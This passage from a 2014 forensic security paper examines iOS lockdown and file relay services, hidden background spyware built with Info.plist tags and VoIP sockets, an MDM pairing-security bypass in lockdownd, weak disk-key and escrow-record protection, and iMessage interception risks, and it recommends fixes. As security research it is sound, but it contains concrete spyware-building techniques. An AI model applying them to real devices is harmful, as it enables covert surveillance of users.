follow.J. Zdziarski / Digital Investigation 11 (2014) 3 –19 8
J. Zdziarski / Digital Investigation 11 (2014) 3 –19 9
Voicemail
The user ’s voicemail database and audio files stored on
the device. Voicemail files are stored as AMR audio files; a
SQLite database provides information about call duration,
and caller metadata.
Other Data Sources that can be requested from the
File Relay :
Other forensically relevant services
Other services yielding good forensic data on the device
include the following. All of these could potentially beabused by an individual, agency, or malicious software with
a valid pairing record.
com.apple.iosdiagnostics.relay
Provides detailed network usage per-application, on a
per-day basis. The data provided details the amount of
network usage in Kilobytes for the past several days,
grouped by application identi fier. This can be used to show
the activity of a particular user over a period of time, which
applications they transfer the most data from, and can help
to correlate potential evidence involving data transmitted
over a network.
com.apple.mobile.MCInstall
This service can be used to install managed con figura-
tions, including those that contain additional data assur-
ance privileges, such as the ability to bypass certain
security mechanisms, locate the device using GPS, or wipe
the device.
com.apple.mobile.diagnostics_relay
Includes additional diagnostics information about the
device, such as battery and hardware state.
com.apple.mobile.heartbeat
Used to maintain a wireless connection to lockdown and
any services accessed. This service essentially performs a
simple heartbeat, and will cause all connectivity to the
destination to freeze unless a regular heartbeat is received.
com.apple.syslog_relay
Can be used to download and stream a device ’s system
log, and many others.
Installation of invisible, malicious software
Malicious software does not require a device be jail-
broken in order to run. An attacker with the right know-
how and 20 –30 s with a trusted mobile device can
install malicious software capable of spying on the user. As
was demonstrated at this year ’s Black Hat 2013 conference
in Las Vegas, the Mactans presentation ( Lau et al. )
revealed what many in the community have known for
quite some time, but avoided discussing. With the simple
addition of an SBAppTags property to an application ’s
Info.plist (a required file containing descriptive tags iden-
tifying properties of the application), a developer can
build an application to be hidden from the user ’sG U I
(SpringBoard). This can be done to a non-jailbroken device
if the attacker has purchased a valid signing certi ficate
from Apple. While advanced tools, such as Xcode, can
detect the presence of such software, the application is
invisible to the end-user ’s GUI, as well as in iTunes. In
addition to this, the capability exists of running an
application in the background by masquerading as a VoIPclient ( How to maintain VOIP socket connection in
background ) or audio player (such as Pandora) by add-
ing a speci ficUIBackgroundModes tag to the same property
listfile. These two features combined make for the perfect
skeleton for virtually undetectable spyware that runs in
the background. If the device is rebooted, applicationsAppleSupport Apple support logs
AppSupport The com.apple.AppSupport.plist configuration,
containing country codes for home andnetwork countries
AppleTV Apple TV playback logs. This suggests the data
is not intended for use in an enterpriseenvironment.
Baseband Baseband diagnostics logs
Bluetooth Bluetooth server logs
CrashReporter Application crash logs, typically submitted to
Apple
CLTM Thefiles/var/logs/cltm.log and/var/logs/
tGraph.csv. Not much is known about these
files, as they do not exist on devices tested.
DataAccess Data access and migration diagnostics logs;
appears to be a list of accounts data is imported
from, and possibly metadata.
DataMigrator Data migrator diagnostics logs
demod Unknown
Device-o-Matic Device-o-Matic logs; Unknown
FindMyiPhone Find-my-iPhone logs. This data source is new
to iOS 7.
itunesstored Logs documenting the environment of the
user ’s iTunes store experience.
IORegUSBDevice IORegistry information. This is empty in iOS 7.
MapsLogs Map logs and query information, including the
NavTraces folder.
MobileAsset Installed asset con figurations, such as text
input certi ficates and information, installed
dictionaries, and other related information.
MobileBackup Mobile backup agent logs containing
miscellaneous diagnostic information from the
backup agent.
MobileDelete This is a new data source for iOS 7 and appears
to store block cleanup logs, created by ahousekeeping service named librarian .
MobileInstallation A complete list of installed applications, as well
as a log containing information aboutapplications that have been previous installed/
uninstalled.
MobileMusicPlayer Contains airplay logs, including a list of airplay
devices that are available on the network.
NANDDebugInfo Very basic FTL ( flash translation layer) debug
info.
Network PPP networking logs
SafeHarbor Returns the contents of the mobile user ’s
SafeHarbor folder, which appears to be empty
on all test devices. This may be related to
Cisco ’s VPN networking.
tmp Contents of the/tmp folder on the file system,
which is outside the sandbox and cansometimes include sensitive information.
VPN
Seemingly phased out, and combined withother data sources, used to contain VPN logs.
WiFi General WiFi logs
WirelessAutomation Logfiles for coreautomationdJ. Zdziarski / Digital Investigation 11 (2014) 3 –19 10
tagged as VoIP applications are automatically invoked to
handle reconnection.
When an application runs in the background, it can
request up to 10 min of background execution time. There
is an exception to this, however, and that is for applications
that exhibit a form of activity through a VoIP socket or
while playing audio. An application need only establish a
socket with a remote server, and label the socket a VoIP
socket, in order for the application to receive execution
cycles automatically whenever data is pushed through the
socket. Even if the application is suspended in the back-
ground, a remote server transferring as little as one byte of
data through an open VoIP socket will cause the application
to become active again. This technique makes it possible to
receive virtually unlimited background cycles, albeit in
chunks of 10 min. Marking a socket as a VoIP socket can be
done using Apple ’s built-in read and write stream property
statements.
Based on the Der Spiegel article, an agency such as the
NSA could easily use the device ’s mobile installation service
to sign a malicious application with an enterprise certi fi-
cate and install it on any target ’s device without ever
registering that device through Apple ’s developer program
(How: Gameboy Emulator finding it ’s way onto non-
jailbroken devices; A cross-platform software library and
tools to communicate with iOS devices natively ).
Such an application could include a payload of trans-
mitting personal data, taking screenshots, recording audio,
obtain geo-location information, or performing a number
of other spying tasks ( Seriot, 2010 ). Additionally, the soft-
ware could be programmed to attack the device to which it
is running on, to obtain escalated privileges or other sen-
sitive information. In fact, Apple has recently beefed up this
type of security as of iOS 7 to prevent a device from con-
necting to its own lockdown port, as was allowed in all
prior versions of iOS. Lastly, an application running on a
user ’s device could be manipulated to attack other devices
on the network, either with exploit frameworks, or by
attempting to connect to other iOS devices ’lockdown ports
over WiFi, if the agency had previously copied pairing re-cords from a subject ’s desktop machine. While there is no
evidence to show that this has ever occurred, the possibility
exists for an agency that can in filtrate desktop machines to
install software that could attack the device it is running on,as well as all other devices on networks that it joins. This
makes a tempting attack point for an agency looking to
infiltrate a high value target ’s known WiFi networks, or to
attack associated targets.
A very simple skeleton includes only two changes to the
application ’sInfo.plist file in order to make this possible
(Lau et al.; How to maintain VOIP socket connection in
background ).
At the very bare minimum, a payload could be pro-
grammed to execute every 10 min with the simple addition
of a VoIP connection handler. The handler would fire every
10 min, even if the device were rebooted ( How to maintain
VOIP socket connection in background ).
An application using this skeleton would be virtually
undetectable by the average user. It would not appear in
iTunes or on the user ’s SpringBoard. Additionally, a
managed con figuration could be loaded onto the device to
prevent the deletion of applications should it ever be
discovered. The only way to detect this type of application
is to use Xcode ’s developer tools to browse the applications
installed in the device ’s sandbox, of which such an appli-
cation would be listed.
If the device is jailbroken, malware can be made much
more invisible and elusive, embedded into operating sys-
tem components, and virtually undetectable even to some
experts.
Fingerprint/passcode pairing security override
Introduced with iOS 7 was a new security mechanism to
help thwart juice jacking. This was a good step forward in
terms of pairing security, and ensured that any device
attempting to establish a trusted relationship with the
device had to be explicitly authorized by the user, throughJ. Zdziarski / Digital Investigation 11 (2014) 3 –19 11
means of tapping a “Trust ”button. With this feature,
plugging an iOS device into someone ’s laptop, or a mali-
cious charger or other device, would cause a con firmation
screen to require the user first trust the device before
granting privileged access. This feature would, if correctly
functioning, prevent an attacker from establishing a new
pairing relationship with a targeted device, limiting their
capabilities so that they would have to steal an existing
pairing record from a desktop machine, which is not always
feasible. In addition to this, such a feature would potentially
interfere with more clandestine (black bag) approaches to
establish pairing with and access high pro file targets ’de-
vices in the field (such as a hotel or bar), where a paired
desktop may not be available, would be limited by iOS 7 ’s
new security feature.
With this new feature, and with the introduction of
fingerprint locking mechanisms for newer iOS devices
(making it dif ficult to turn over a “password ”to an enter-
prise upon leaving the company), also comes an apparent
bypass to the device locking mechanism, which overrides
the device ’s passcode/ fingerprint lock and user trust checks
completely, allowing the device to be paired, synced, and
possibly unlocked later with the user ’s original escrow bag,
which can be obtained through the file relay service on the
device. This allows the device to be paired not only without
authorization from the user, but also while locked with apasscode or a fingerprint. While this feature remains un-
documented as of the date of this paper, it is presumed that
the purpose of this bypass mechanism is to service legiti-
mate enterprise owned devices enrolled into a managed
profile, so that an employee ’s device can be forensically
acquired after leaving the company, are incapacitated, or
unwilling to provide their fingerprint or password to un-
lock the device. The mechanism which allows the bypass to
be engaged performs a check to ensure that the supervisor
certificates provisioned on the device match that of the
supervisor attempting to bypass the lock. This feature is
present in iOS 7 ’s public release.
Apple ’s new over-the-air (OTA) supervision and auto-
matic enrollment for iOS 7 ’s MDM ( iOS 7 and business )
would appear to allow enterprise or government-owned
devices to be con figured out of the box with a set of re-
strictions upon activation. Additionally, later enrollment
into an enterprise MDM could potentially also enable this
security bypass mechanism to permit corporate access to
any device that has been enrolled.
In short, there appear to be two ways to apply a cloud
confi
guration to an iOS 7 device: through enrolling the
device with an enterprise MDM (using an existing paired
connection), or over-the-air through Apple ’s servers, at the
time of activation.
Centrally managed cloud con figuration
The pairing security bypass is tied to the Managed
Configuration (MC) portions of the operating system,
which touch, but also operate independently of systems to
enroll and manage mobile device management (MDM)
restrictions for an enterprise. The actual data to activate the
bypass is stored in a class named MCCloudCon figuration .A
managed con figuration can be written through the device ’spublic facing MDM service com.apple.MCInstall , with
proper pairing authentication, or written directly from
code running on the device, such as con figuration dae-
mons, or any other process with privileged (root) access.
The managed con figuration framework includes a
daemon named teslad , which has what appear to be direct
hooks into Apple ’s servers for the loading of managed cloud
configurations (the con figuration containing –among other
restrictions –the pairing security bypass). The teslad
daemon, part of the Managed Con figuration framework,
downloads a cloud con figuration certi ficate from https://
iprofiles.apple.com/resource/certi ficate.cer , and performs a
number of different validations against sessions ( https://
iprofiles.apple.com/session ) and pro files (from https://
iprofiles.apple.com/pro file) between the device and a
configuration service referred to as Absinthe, hosted on
Apple servers. The daemon identi fies itself with an HTTP
User-Agent of ConfigClient-1.0 to the server.
It is worth noting that a successful MiTM combined with
a certi ficate forgery (both presumed to be within the reach
of government agencies such as NSA), that all signing could
potentially become compromised. Code already exists in
the public to emulate an Apple policy server, which could
be used to change the device ’s policy ( The iOS MDM
protocol ). This may not even be necessary, however, as a
suspicious switch appears to already exist to disable cer-tifi
cate veri fication over the HTTPS connection. The
-[MCTeslaConfigurationFetcher connection:will
SendRequestForAuthenticationChallenge:]
method checks for a con figuration directive named
MCCloudConfigAcceptAnyHTTPSCertificate , and if set,
will automatically bypass the server trust process, effec-
tively allowing any web server to masquerade as Apple ’s
Absinthe server.
The teslad daemon suggests that Apple has the ability to
centrally load a managed con figuration onto a device, when
invoked. The daemon ’s
-[MCTeslaConfigurationFetcher convertCloud
ConfigDictionary:toManagedConfiguration:]
method allows data transferred across the network
connection as an NSDictionary object to be converted
into a managed con figuration, where it is sent back to the
client that requested the con figuration. The only client
identi fied thus far is Apple ’sSetup program on the device.
Apple ’s Setup program attempts to set up a cloud con fig-
uration when the device is first activated, inside the
method named. -[ActivationController _fetch-
CloudConfig] . If a cloud con figuration is written when the
device is first activated, it can be programmed to later
check in at regular intervals for changes to the policy.
Once an MDM is installed, a check-in mechanism is
invoked via APNS (Apple Push Noti fication Service) to apply
new management changes ( The iOS MDM protocol ). The
profile can later be updated remotely through a mechanism
that pulls a new cloud con figuration from a URL. A new cloud
configuration can be downloaded by invoking the
-[MCProfileConnection retrieveCloudConfiguration
FromURL:username:password:anchorCertificates:
completionBlock:] method. HTTP based managed
configuration makes for a delicate attack surface for NSA to
target, at best.J. Zdziarski / Digital Investigation 11 (2014) 3 –19 12
Possible uses
While it is likely that Apple has added this feature
exclusively for legitimate use by enterprises, even this has
some serious implications: with today ’s BYOD culture,
employees may be unknowingly allowing their personally-
owned devices to be forensically accessible to a company ’s
internal investigations team (as well as law enforcement,
with the enterprise ’s consent) by simply enrolling it into
the corporate MDM environment. Additionally, new em-
ployees issued devices may be permitted to retain personal
information on their corporate device without first being
informed that their devices could, at any time, be subject to
a search that bypasses security.
In addition to potential abuse by the enterprise, an
agency seeking to commit espionage could potentially set
up their own MDM pro file and enroll the device from a
compromised desktop, using services running under the
device ’s lockdown. The advantage of this would be to take
advantage of an otherwise short-term connection with the
desktop to enroll the device itself into an MDM. When
installed, MDMs can also be con figured to be removable
only with a passcode.
It is speculative, however worth mentioning, that
select law enforcement agencies could potentially also be
granted a mechanism to push such a con figuration to a
device through Apple ’sc o n figuration server, or through
other means, but possibly only at the time the device is
provisioned (post purchase or firmware upgrade). Given
Apple ’sr e c e n tp a t e n t filing to allow certain restrictions to
be wirelessly pushed to devices in secure government
facilities ( Apparatus and methods for enforcement of
policies upon a wireless device ), it ’s conceivable that
such restrictions overlap with the same managed
configuration interfaces. If Apple has developed the
capability to push a camera restriction to devices that are
not enrolled in an MDM, then it is also possible that they
may have developed the capability to push security by-
passes as well, for purposes such as InfoSec enforcement
at military installations, or under subpoena. No evidence
has been found supporting that this has actually
occurred, however.
Given recent articles of Apple deluged by requests to
image mobile devices for law enforcement ( Apple deluged
by police demands to decrypt iPhones, 2013 ), providing
limited law enforcement access to such a bypass could be
beneficial for Apple, by providing a mechanism to remotely
unlock a device for a speci fic purpose, where it can be
forensically acquired by existing commercial tools. The
benefit for Apple to do this would be to lighten the load and
cost involved with manually processing subpoenas for data
acquisition, to which Apple has reportedly been months
behind ( Apple deluged by police demands to decrypt
iPhones, 2013 ). Again, however, such a mechanism would
be required to be pushed from a trusted supervisor, and so
its success would greatly depend on how the device was
provisioned by testlad out of the box, or later provisioned
by an enterprise.
Lastly, due to the MCTestlaCon figurationFetcher
mechanism, which looks for a managed con figuration at
device setup time, it is inte resting to note that, were agovernment agency (such as NSA) and Apple cooperating
on this level, it is plausible that Apple could provision
any device as a supervised device fresh out of the box
using this mechanism. This would allow for the agency to
potentially target a subject in such a way that whenever
the subject either upgraded t heir device or restored an
existing one, that it would be automatically provisioned
as a supervised device when it was set up. With this kind
of collusion, the supervisor could monitor, and even
install software on the subject ’s device without their
knowledge or approval, in the same way that the
mechanism is seemingly already used to allow this
functionality for enterprises looking to perform bulk
provisioning.
Anatomy
As mentioned earlier in this article, the lockdownd
process is responsible for performing all pairing and
authentication of new connections, before allowing new
services to be spawned. Previous versions of iOS would
deny pairing of locked devices with the error Password-
Protected . Looking at iOS 7 ’s lockdownd daemon, two new
branch instructions have been added to bypass this
check.
The code segment just shown depicts part of the secu-
rity check performed inside lockdownd when a pairing is
requested. At the beginning of the code segment, a sub-
routine inside lockdownd (sub_1F100, actually named
mc_allow_pairing ) is called, which in turn invokes the
–[MCProfileConnection hostMayPairWithOption-s:challenge:] method inside of Apple ’s managed
configuration framework. This check results in one of four
possible actions.
/C15Deny all pairing
/C15Allow pairing, but prompt the user
/C15Allow pairing with no user prompt (and while locked)
/C15Allow pairing with a challenge/response
The results are returned into three different variables;
one as a return value from the subroutine, and two
assigned to variables whose pointers are passed into
mc_allow_pairing as arguments. These three variables
indicate whether pairing is allowed at all, whether pairing
security should be completely bypassed, and whether
pairing should require a challenge/response.
Between the call to mc_allow_pairing at 193A6 and the
code at 193D8 (which denies pairing if the device is locked
with a passcode, or later on if the user doesn ’t approve it),
are two bypasses. One of these bypasses is signi ficant. The
branches to 19B06 (from 193C0) effectively “skips over ”
pairing security entirely if the call to mc_allow_pairing
allows pairing with no user prompt. This is determinedfrom instructions within the hostMayPairWithOptions
method, which obtains information from the device ’s
cloud con figuration, and performs a type of X509 certi fi-
cate based validation to ensure the bypass is authenti-
cated with the proper credentials. The source of this
certificate is unknown, but assumed to be related to anJ. Zdziarski / Digital Investigation 11 (2014) 3 –19 13
J. Zdziarski / Digital Investigation 11 (2014) 3 –19 14
MDM certi ficate. Once the certi ficate passes validation,
the bypass is enabled. When this occurs, the lock state of
the device is never checked, and the user is never
prompted to trust the host it is connected to. The code
branches to the same location that the bypass at 193D4
branches to if pairing security is not supported (for
example, on an AppleTV or other device without a screen
lock).
A look inside of the ManagedCon figuration framework
inside Apple ’s shared cache shows that the decision to
bypass pairing security is based, in part, on certi ficate data
retrieved from a call to [ [ MCProfileConnection
sharedConnection ] cloudConfigurationDetails
].Since iOS 7 does not yet have a jailbreak, it ’s difficult to
determine just what information is stored in this
configuration.
If pairing security is overridden through this mecha-
nism, then both the user trust prompt and the device lock
test are bypassed, allowing the device to continue pairing,
even if a passcode is set. The logic, in pseudocode, works as
follows.
At it ’s very best, the device security bypass is an un-
documented MDM feature allowing enterprises to accessany enrolled (or over-the-air enrolled) iOS MDM device.
Even this, however, creates a signi ficant threat to the se-
curity of the many iOS users working for companies with a
BYOD policy.Suspicious design omissions
While inconclusive, it is worth noting that the iOS
operating system has noticeable omissions in the design of
the security architecture, which severely degrade the per-
formance of otherwise “good ”security implementations.
The most notable of these are outlined in this section.
Ironically, these design omissions are well within the grasp
of the manufacturer to implement, likely with little effort in
comparison to the rest of the design. It is unknown whether
these omissions are the direct result of pressure from a
government agency, or simply poor design choices, how-
ever it is dif ficult to grasp how a team of engineers that are
bright enough to have designed such an impressive system
could have intentionally missed such signi ficant issues that
are detrimental to its security, lending to speculation that
their omission may be intentional.
It is often mistaken that the iOS operating system de-
livers the same level of security as its desktop counterpart
(OS X). Such design omissions do not appear in the desktop
operating system.
Boot-stage disk key left unprotected
The iOS file system depends on a key hierarchy, whose
top tier keys are stored in the effaceable storage (block
zero) of the NAND. This allows for quick data destruction;
by simply overwriting these top tier keys, the entire fileJ. Zdziarski / Digital Investigation 11 (2014) 3 –19 15
system becomes unrecoverable. One signi ficant design
omission in this mechanism is a means of protecting the
top tier keys with a user secret, and those top tier keys
protect any files that are not explicitly protected with one
of the NSFileProtectionComplete classes. Unlike the data-
protection class keys, protected with a user passphrase,
the top tier keys are protected using a key derived from
hardware-based information. This design omission results
in a majority of user data from the file system at risk of
exposure to an attacker with code-execution privileges or
the ability to extract and deduce the hardware-based keys.
This ability to gain code execution is what rendered virtu-
ally unlimited access to data at rest for all iPhone 4 and
older devices. The design places a signi ficant portion of user
data at risk from threats including a number of jailbreak
and forensics tools, possessors of zero-day code-execution
exploits, and the manufacturer (Apple), who has code
signing authority to boot such code on the device.
The encrypted iOS file system causes unique file keys to
be generated for every file on the device. These unique file
keys are then encrypted and protected in one of two ways.
Files marked as protected using data-protection are pro-
tected with a key from the file system keybag, which must
be unlocked either by the user ’s passphrase, or the escrow
key from a backup key (if the device has not been rebooted
since it ’s last unlock). The second method (and how all files
not protected with data-protection encryption are pro-
tected) is to protect the file with a key stored in the
effaceable storage, referred to as the Dkey (or class-4
key).This Dkey is itself encrypted using keys calculated
from the device ’s unique hardware. No publicly available
methods have been found to deduce the hardware keys
from the device, however a running kernel can decrypt the
file system when the device is booted, allowing anyone
with code-execution capabilities to access the large portion
of the file system that is not protected with data-protection.
It is unknown whether or not the manufacturer has
been (or could be) forced, under secret court order, to
provide one or more law enforcement branches with the
ability to execute a running kernel with custom code,
however Apple is known to provide services to law
enforcement to provide an image of the file system, sans
what Apple deems, “encrypted files”, which are believed to
refer to files using data-protection.
The ability to decrypt the class-4 portions of the file
system provide an attacker the capability of acquiring a
significant amount of user data from the device, as only a
small portion of the file system typically uses data-
protection. To add to this exposure, however, backups of
the keybag keys are stored in an escrow record whenever
a pairing record is created with a desktop machine, and
can be used to unlock the keybag IF the device has not
been rebooted since its last device unlock by the user,subsequently decrypting data that would otherwise be
protected with data-protection. This escrow bag is
accessed in the directory /private/var/root/Library/Lock-
down/escrow_records on the mobile device, and is only
encrypted with the Dkey. With an escrow record, it is
possible to unlock the keybag on the device and access theremaining files protected with data-protection, however
the lockdownd services running on the device will do thisfor the user automatically, whenever an escrow bag is
supplied in lockdownd requests. Exploiting this requires
only that at least one device was ever paired with the
mobile device. This technique is not possible unless the
device has –at some point since its last reboot –been
unlocked, to satisfy the NSFileProtectionComple-
teUntilFirstUserAithentication protection of the keybag it-
self. Black bag techniques involving theft, desktop
penetration, and other such types of attacks, however may
be possible while the device is in this state.
In contrast, Apple ’s desktop implementation (File Vault)
protects the file system key hierarchy with a key that is
derived from a user-supplied passphrase on boot. When
implemented properly, only a small portion of boot code
lies unencrypted on disk, which then accepts a passphrase
in order to unlock the rest of the file system. As a result of
this design, the disk encryption provided by File Vault is
hardware independent (portable), and is instead depen-
dent on a secret supplied by the user.
The more secure full disk encryption implementation
provided by File Vault could have easily been incorporated
into iOS, in one of two ways. The iOS boot loader (iBoot)
could prompt the user for a passphrase whenever the
mobile device is rebooted, or an additional key tier could
have been added to the operating system firmware in such
a way that a key derived from a user passphrase Key
User
were prompted for at boot, and incorporated into the file
system keys of the user data partition of the device. This
would have resulted in the root partition (which is, by
default, read-only) being readable at the time of boot (via
Dkey), and the user data partition being readable only after
f(Dkey jKey User) could be calculated. Since the user data
partition is the only partition that either requires or uses
disk encryption, the operating system could, today,
completely boot and prompt the user for a passphrase prior
to mounting any user data.
This design omission has made it possible for Apple to
service law enforcement subpoenas to provide a disk image
of the user file system, however this has been at the
expense of considerable data security, as evidenced by the
number of forensics tools capable of performing physical
acquisition of past devices, and the expectation that current
and future devices will be (or have been) compromised in a
similar fashion.
Packet snif fing services not moved to developer mount
When developer-mode services were added to iOS, a
number of services were moved to a remote disk that was
mounted to install developer tools on the device. By
default, these services are not installed or running on the
device, but later installed by developers using Xcode, when
the “Use for Development ”option is selected with a given
device. The packet sniffer service (com.apple.pcapd),
whose only practical legitimate use is for developer in-spection of packet data, was not moved, and is therefore
active on every iOS device, including those that have never
been con figured for developer mode. One can only specu-
late as to why a service to capture and analyze packet data,
either over USB or WiFi, is active on all devices running
recent versions of iOS.J. Zdziarski / Digital Investigation 11 (2014) 3 –19 16
Apple can solve this problem immediately by removing
the pcap service from the operating system entirely, or
installing it only when a device is placed in developer
mode.
Lack of adequate pair purging
When iOS 7 shipped, a new trust dialog was added so
that a user must authorize all attempts to establish a
pairing. This appeared in Apple ’s change log immediately
after Lau et al. was announced, exploiting the lack of pair-
ing security on iOS devices. From 2007 to 2012, however, all
iOS devices lacked this basic pairing security function,
allowing any malicious device to establish a semi-
permanent pairing. Prior demonstrations ( Beware of juice
jacking ) had been given at security conferences, however,
showing the concept of “juice jacking ”to gain access to a
user ’s data by masquerading a malicious device as a legit-
imate one (such as an alarm clock). What the public may
not have realized at the time was that such techniques
allow potentially permanent and unfettered access to user
data, over both USB and WiFi. Unfortunately, today users
are being trained by third party products (such as FM
transmitters, and third party chargers) to press Trust inorder to achieve the functionality they desire, even though
it should be unnecessary.
In addition to the lack of adequate pairing authentica-
tion, even iOS 7 ’s internal lockdown daemon shows evi-
dence of a new mechanism to reset the pairing on the
device, however this reset mechanism can only be accessed
from a privileged process running on the device itself, and
cannot be triggered over USB or WiFi. As of this writing, no
operating system component exists to actually take
advantage of this mechanism to allow the user to reset the
pairing on the device, which could be used to destroy any
rogue pairings established on the device. Lack of this
mechanism being functional, all device pairings remain on
the device until the device is restored.
Apple can solve this problem immediately by adding a
feature to iOS ’settings to review and selectively (or
completely) reset pairing.
Other bugs seem to persist with respect to pairing se-
curity. Supervised devices, whose pairing can be disabled,
appear to occasionally allow pairing when connected to
devices in certain states (such as certain desktop that are
still in the process of booting). These bugs have yet to be
weeded out by the manufacturer, however could poten-
tially allow pairing even when restricted by corporate
policy.
Lack of pairing record pinning
As was noted earlier in Boot-stage disk key left
unprotected section, pairing records contain an escrow
key capable of unlocking the keybag on the device; theseescrow keys are not only stored unencrypted on the device
itself, but also stored unencrypted on the desktop machines
they are paired with. By failing to wrap the pairing record
with any form of user passphrase on either side, attackers
compromising desktop machines, such as appears the case
with individuals targeted by NSA, are able to copy and stealthe pairing relationship with any mobile devices the
desktop is paired with.
Apple could solve this problem immediately by
providing an optional mechanism to encrypt pairing record
keys with a user passphrase, such that a user must enter a
passphrase the first time they sync with the device after
reboot. If implemented, this would prevent the theft of
pairing record data while at rest from both malware and
attackers.
Lack of geofencing in fingerprint reader
The iPhone 5s introduced a fingerprint reader as a
means of authenticating the user on a device. Because a
user ’s biometrics are not considered protected in the same
way as a password by the US Fifth Amendment (as far as
the courts are concerned), a user can (in many cases) be
legally compelled to authenticate their fingerprint on the
device. Additionally, with a few thousand dollars of
equipment, the fingerprint reader can be defeated
(German hackers allegedly break touch ID fingerprint
scanner ) with a fingerprint lifted from the device, or
another source. Most fingerprint labs already possess the
required equipment to manufacture a print. This mecha-nism, when used, poses a signi ficant risk of those who are
targeted by an attacker or a government (including a
foreign government) seeking access to the data on the
device. While certain safeguards do exist, such as requiring
a passcode after 48 h or after reboot, Apple has not
included a capability to disable the fingerprint reader
when the user leaves a speci fic radius.
Apple could solve this problem by incorporating a
mechanism to add a geofence into the operating system, so
that a fingerprint reader will permanently disable until a
passcode is supplied, if the user leaves areas they deem as
“secure ”locations. In order to make this effective, the
operation of the fingerprint reader should only be disabled,
and never enabled when entering the perimeter of the
geofence.
Integrity of iMessage
In October 2013, Quarkslab exposed design flaws
(iMessage privacy )i nA p p l e ’s iMessage protocol demon-
strating that Apple does, despite its vehement denial,
have the technical capability to intercept private iMes-
sage traf fic if they so desired, or were coerced to under a
court order. The iMessage protocol is touted to use end-
to-end encryption, however Quarkslab revealed in their
research that the asymmetric keys generated to perform
this encryption are exchanged through key directory
servers centrally managed by Apple, which allow for
substitute keys to be injected to allow eavesdropping to
be performed. Similarly, the group revealed that certi fi-
cate pinning, a very common and easy-to-implementcertificate chain security mechanism, was not imple-
mented in iMessage, potentially allowing malicious
parties to perform MiTM attacks against iMessage in the
same fashion. While the Quarkslab demonstration
required physical access to the device in order to load a
managed con figuration, a MiTM is also theoreticallyJ. Zdziarski / Digital Investigation 11 (2014) 3 –19 17
possible by any party capable of either forging, or
ordering the forgery of a certi ficate through one of the
many certi ficate authorities built into the iOS TrustStore,
either through a compromised certi ficate authority, or by
court order. A number of such abuses have recently
plagued the industry, and made national news ( Another
certificate authority issues dangerous certi ficates;
Digital certi ficate authority hacked; Mozilla toughens
up on CA abuse ).
Apple ’s response to Quartkslab ’s research has been
continued denial of the technical capabilities to or the
desire to intercept iMessage traf fic, however the technical
details of the report have been validated by a number of
independent security researchers. Because any organiza-
tion that is compelled to perform surveillance on its cus-
tomers is likely also under a court order to keep such
activities con fidential, the technical revelations alone are
enough to potentially damage trust in the con fidentiality of
Apple ’s services; with today ’s secret government surveil-
lance operations, the only way to truly gauge security is by
the quality of the technology. In this case, there appear to
be not only flaws, but potentially suspicious flaws, further
chipping away at Apple ’s credibility in securing iMessage.
The design flaws in the iMessage protocol are suspicious
to the degree that certi ficate pinning is a feature already
built into the iOS operating system for App Store de-velopers, and has been made very easy to implement by
Apple, yet is not implemented in Apple ’s own software. A
reasonable amount of Apple documentation even exists to
describe the process by which a developer can implement
pinning. It was, as it seems, that Apple is not eating their
own dog food. The overall design and use of a centrally
managed key directory further calls into question the
integrity of the iMessage system, as Apple ’s implementa-
tion allows for the most classic form of MiTM to be per-
formed; a technique has been well known in information
security for decades.
Quarkslab has introduced a counter-surveillance tech-
nique to help mitigate the risk of iMessage surveillance, by
monitoring the public keys for changes. The iMITMProtect
tool attaches to the imagent process and intercepts keys
sent by Apple ’s key server. If a public key ever changes
(which should not happen), the tool will alert the user that
their communication may be the target of compromise, and
will serve up a cached copy of the public key to allow for
continued secure communication with the endpoint. This
mechanism will identify and help combat most types of
MiTM event, except in cases where a key is compromised
from the point of initial exchange. Such an attack would
only likely be possible if Apple were substituting keys for
one or all users from the moment they are first generated.
While a good monitoring and counter-surveillance tool,
this is not a complete solution.
Apple could greatly improve the overall security of
iMessage. A number of instant messaging protocols incor-porate perfect forward security (PFS), which can be used to
establish encrypted sessions in an untrusted environment,
even if one party ’s keys are exposed. Because Apple hosts
the keys for both parties on a centralized server, movingkey generation and storage closer to the end-user, as
instant messaging application do, can greatly improve thesecurity of iMessage. The Dif fie–Hellman key exchange is a
well known and accepted protocol for performing crypto-
graphic key exchange over an insecure channel, and is
incorporated by PFS. Finally, implementing the certi ficate
pinning mechanism that Apple, themselves, have already
provided for developers, would greatly reduce the likeli-
hood of a MiTM attack using a rogue certi ficate, or other
means.
Overall, the design flaws of iMessage appear to be valid,
however the question remains of whether these design
flaws were actually mistakes in the design, or omissions
intentionally left out of the design.
References
A cross-platform software library and tools to communicate with iOS
devices natively. http://www.libimobiledevice.org .
Another certi ficate authority issues dangerous certi ficates. http://
nakedsecurity.sophos.com/2011/11/03/another-certi ficate-authority-
issues-dangerous-cert ficates/ .
Apparatus and methods for enforcement of policies upon a wireless de-
vice. http://patft.uspto.gov/netacgi/nph-Parser?Sect1 1⁄4PTO2&Sect2 1⁄4
HITOFF&u 1⁄4/netahtml/PTO/search-adv.htm&r 1⁄436&p 1⁄41&f1⁄4G&l1⁄4
50&d 1⁄4PTXT&S1 1⁄4(20120828.PD. þANDþApple.ASNM.http://patft.
uspto.gov/netacgi/nph-Parser?Sect1 1⁄4PTO2&Sect2 1⁄4HITOFF&u 1⁄4/neta
html/PTO/search-adv.htm&r 1⁄436&p 1⁄41&f1⁄4G&l1⁄450&d 1⁄4PTXT&S1 1⁄4
(20120828.PD. þANDþApple.ASNM.)&OS 1⁄4ISD/20120828 þANDþAN/
Apple&RS 1⁄4(ISD/20120828 þANDþAN/Apple) .
Apple deluged by police demands to decrypt iPhones. http://news.cnet.
com/8301-13578_3-57583843-38/apple-deluged-by-police-demands-
to-decrypt-iphones/ ; May 2013.
Bédrune Jean-Baptiste, Sigwald Jean. iPhone data protection in depth.
http://esec-lab.sogeti.com/dotclear/public/publications/11-hitbamster
dam-iphonedataprotection.pdf ;http://code.google.com/p/iphone-data
protection/ .
Beware of juice jacking. http://krebsonsecurity.com/2011/08/beware-of-
juice-jacking/ .
25C3: hacking the iPhone; 2008; http://theiphonewiki.com/wiki/25C3_
presentation_%22Hacking_the_iPhone%22 .
Digital certi ficate authority hacked. http://www.darkreading.com/
attacks-breaches/digital-certi ficate-authority-hacked-doz/
231600498 .
Evasi0n jailbreak. http://www.evasi0n.com .
German hackers allegedly break touch ID fingerprint scanner. http://
www.ibtimes.com/apple-iphone-5s-defeated-german-hackers-
allegedly-break-touch-id- fingerprint-scanner-video-1409584 .
Hacking iOS applications. http://archive.hack.lu/2012/Mathieu%
20RENARD%20-%20Hack.lu%20-%20 ￼Hacking%20iOS%
20Applications%20v1.0%20Slides.pdf .
